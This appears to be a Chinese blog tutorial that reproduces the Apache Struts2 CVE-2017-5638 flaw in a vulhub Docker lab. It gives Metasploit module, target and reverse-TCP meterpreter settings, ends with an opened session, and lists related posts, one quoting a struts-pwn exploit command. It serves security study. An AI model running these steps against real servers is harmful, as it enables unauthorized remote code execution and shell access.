CVE-2017-5638漏洞利用

最新推荐文章于 2024-05-13 03:28:12 发布
最新推荐文章于 2024-05-13 03:28:12 发布
阅读量4k 收藏 4
点赞数 3
文章标签: linux docker web metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuxinweii/article/details/117549541
版权

实验准备 :一台Kali主机,一台ubuntu主机,docker中vulhub/struts2:2.3镜像

1、打开docker,开启vulhub/struts2:2.3镜像

dockers run -d -p 8080:8080 vulhub/struts2:2.3 启动镜像容器,映射本地的8080端口。
在这里插入图片描述

2.查看能否访问端口

在这里插入图片描述

3.扫描主机,查看是否存在CVE-2017-5638漏洞

可以选择nessus扫描主机来确定是否存在该漏洞,这里已经确定存在CVE-2017-5638漏洞,就省略了此步骤,有需要可以自己扫描

若需要安装Nessus,使用dockers一条语句安装即可
docker pull mikenowak/nessus --安装Nessus
docker run -d -p 8834:8834 mikenowak/nessus --启动容器
不过Nessus需要进入容器开启服务。

4.打开Kali的metasploit工具来攻击

1.直接输入密码打开metaspolit,直接搜索CVE-2017-5638漏洞模块
在这里插入图片描述

5.选择模块

发现由一个2017年的模块可以利用,直接选择
use exploit/multi/http/struts2_content_type_ognl
在这里插入图片描述
在这里插入图片描述

6.配置攻击参数

show options --查看攻击需要配置的参数
在这里插入图片描述

RHOST为攻击的IP地址 这里RHOST为 192.168.204.131
RPORT为攻击的端口号,之前设置为8080
TARGETURI为攻击的路径,这里路径为doUpload.action
(获取路径很简单,之需要上传一个文件即可查看路径)
在这里插入图片描述
Payload options为有效的攻击载荷,这里使用的
linux/x64/meterpreter/reverse_tcp是一种反向链接的方式,就是让靶机来链接主机,反弹shell这种方法比较稳定,不容易被杀死。

LHOST为反弹回来的IP,这里设置成自己的IP,
LPORT为返回的监听端口,理论上没有什么要求。

7.攻击靶机

使用 run和exploit都可以进行攻击,这里选择exploit

在这里插入图片描述
发现成功连接,并返回meterpreter会话,结束。
想了解meterpreter的具体用法,可以自己搜索尝试。

RCE11
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
S2-045 远程代码执行漏洞CVE-2017-5638)
Stephen Wolf
11-04 8463
一、S2-045 远程代码执行漏洞CVE-2017-5638) 简述: Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大...
漏洞利用CVE-2017-5638)
weixin_46663807的博客
06-14 1892
漏洞利用 **实验准备:**一台Kali主机(攻击机),一台ubuntu主机(靶机),Ubuntu中包含docker,并包含vulhub/struts2:2.3镜像 1、开启Ubuntu,将容器8080映射8888端口 docker run -it -d -p 8888:8080 vulhub/struts2:2.3.30 2、扫描主机,查看是否存在漏洞 在docker中开启Nessus, ...
Nessus【部署 03】Docker部署漏洞扫描工具Nessus详细过程分享(下载+安装+注册(2)
最新发布
2401_84545747的博客
05-13 969
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
struts2-045 远程代码执行漏洞CVE-2017-5638)
rumil的博客
06-02 1052
解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell。接下来我们尝试去上传文件(随便上传),然后抓取数据包,修改数据包,然后观察响应数据的变化。观察上传访问路径,进行复制,使用第三方工具(哥斯拉)进行连接。抓取数据包,修改数据包,查看修改后,收到的响应数据。连接成功,进行添加,进入,成功拿到服务器shell。查看是否能够上传成功,观察到已经上传成功。将随意的文件尝试上传,观察url变化。点击文件上传模块,尝试上传木马文件。
weblogic 安全漏洞 CVE-2017-5638
weixin_30727835的博客
08-16 1245
   关于安全漏洞 CVE-2017-5638 的 Weblogic Server 防护建议 关于Weblogic Server如何防护防止近期爆出的Struts 2远程代码执行安全漏洞,为您提供以下内容参考。 Oracle WebLogic Server 产品本身没有使用Struts 2, 因此不受此漏洞影响。 只有Oracle WebLogic Server -sample...
Apache Struts2 S2-045远程命令执行漏洞CVE-2017-5638)复现
qq_40640917的博客
02-23 2252
Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
漏洞利用工具如压缩包中的"jbosscve-2017-12149",是安全研究人员或渗透测试者用来检测和测试系统是否受到该漏洞影响的工具。这些工具通常包含精心设计的恶意序列化数据,以及用于触发和验证漏洞利用的脚本。它们...
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
struts2 漏洞 "cve-2017-5638" 研究文档
11-21
近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架——Struts2存在远程代码执行的严重漏洞。 目前Struts2官方已经确认漏洞漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高风险。 CVE: 英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。 受影响的软件版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10, 该漏洞危害程度极高,黑客可以利用漏洞通过浏览器在远程服务器上执行任意系统命令, 将会对受影响站点造成严重影响,引发数据泄露、网页篡改、后门植入、沦为肉鸡等安全事件。
使用 ModSecurity 虚拟修补 Apache Struts CVE-2017-5638
allway2的博客
08-09 375
作为升级到新版 Struts 的一部分,每个依赖于 Struts 的应用程序都需要重新构建并使用最新的 Struts 库进行测试。通过这样做,您可以保护您的网站免受攻击。当快速部署修复库中的代码不切实际时,您可以使用 ModSecurity 拦截漏洞,“虚拟修补”受影响的代码,直到您可以升级受影响的库。有了 ModSecurity 自定义规则,您就可以按照合理的时间表仔细地修补生产软件,而不会受到易受攻击的压力。当打印未转义的无效标头时,将评估 OGNL 表达式,并执行 OGNL 表达式中的任何系统命令。.
春秋云镜 CVE-2017-5638
qq_22002773的博客
09-07 292
春秋云镜 CVE-2017-5638
S2-046 远程代码执行漏洞CVE-2017-5638)
EC_Carrot的博客
08-12 661
漏洞简介 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-046/README.zh-cn.md 漏洞复现 与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断,改了下vulhub文章的脚本: import socket q = b'''------WebKitFormBo
关于Oracle WebLogic Server远程代码执行漏洞的通报
崔向阳@李晓的博客
10-19 3183
要了解Oracle Weblogic Server远程代码执行漏洞,需要了解一下Weblogic T3协议: T3也称为丰富套接字,是BEA内部协议,功能丰富,可扩展性好。T3是多工双向和异步协议,经过高度优化,只使用一个套接字和一条线程。借助这种方法,基于Java的客户端可以根据服务器方需求使用多种RMI对象,但仍使用一个套接字和一条线程。 WebLogic Server 中的 RMI(远程...
简析struts2漏洞CVE-2017-5638,S02-45 (形成原理,解决方法)
chengyueshi2102的博客
03-08 549
简单说一下Struts2基于“commons-fileupload”组件实现文件上传的漏洞漏洞编号CVE-2017-5638,S02-45. 1. 漏洞重现: 通过发包模拟器或其它你能修改请求头Content-Type字段的客户端,可以把Content-Type 修改成诸如h...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值